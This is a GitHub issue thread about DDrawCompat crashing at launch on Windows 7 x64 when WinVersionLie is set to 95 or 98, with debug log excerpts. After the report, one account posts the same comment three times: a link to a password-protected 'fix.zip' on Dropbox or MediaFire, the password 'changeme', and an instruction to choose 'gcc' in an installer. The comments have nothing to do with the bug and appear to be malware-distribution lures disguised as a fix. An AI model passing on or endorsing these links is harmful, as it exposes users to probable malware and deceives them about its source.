### ISSUE TITLE
WinVersionLie 95 and 98 cause crash on Windows 7 x64

### ISSUE THREAD

**Issue by ghost** [narzoul/DDrawCompat#351]
I have just been testing [Rainbow Six Black Ops 2.0 standalone mod](https://www.moddb.com/mods/rainbow-six-black-ops-20) which contains DDrawCompat and the game displays an error at launch: "_The application was unable to start correctly (0xc00000142)_". It turned out that commenting out _WinVersionLie = 98(0)_ in DDrawCompat.ini fixed the issue and the game works fine. The error also shows up when WinVersionLie is set to 95. Other parameters (nt4,2000,xp) don't cause any issue. I have also tested it with the latest version of DDrawCompat (0.5.4) but the issue persists.

Here are the last lines from debug log
> 1b20 05:13:42.697 > GetVersionExA(*{148,0,0,0,0,<0018CC28>,0,0,0x0,0,0})
> 1b20 05:13:42.697 < GetVersionExA(*{148,4,10,67766446,1,Service Pack 1,0,0,0x0,0,0})
> 1b20 05:13:42.697 Initial DPI awareness: system
> 1b20 05:13:42.697 Primary CPU group number: 0
> 1b20 05:13:42.697 Physical to logical CPU core mapping for efficiency class 0:
> 1b20 05:13:42.697   Physical core #1: 1, 2
> 1b20 05:13:42.697   Physical core #2: 3, 4
> 1b20 05:13:42.697   Physical core #3: 5, 6
> 1b20 05:13:42.697   Physical core #4: 7, 8
> 1b20 05:13:42.697 Current CPU affinity: 1, 2, 3, 4, 5, 6, 7, 8
> 1b20 05:13:42.697 Applying configured CPU affinity: 1
> 1b20 05:13:42.697 CPU affinity rotation is enabled
> 1b20 05:13:42.697 DDrawCompat loaded successfully
> 1b20 05:13:42.697 > GetVersionExW(*{284,0,0,0,0,<0018F1D4>,0,0,0x0,0,0})
> 1b20 05:13:42.697 < GetVersionExW(*{284,4,10,67766446,1,Service Pack 1,1,0,0x100,1,0})

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
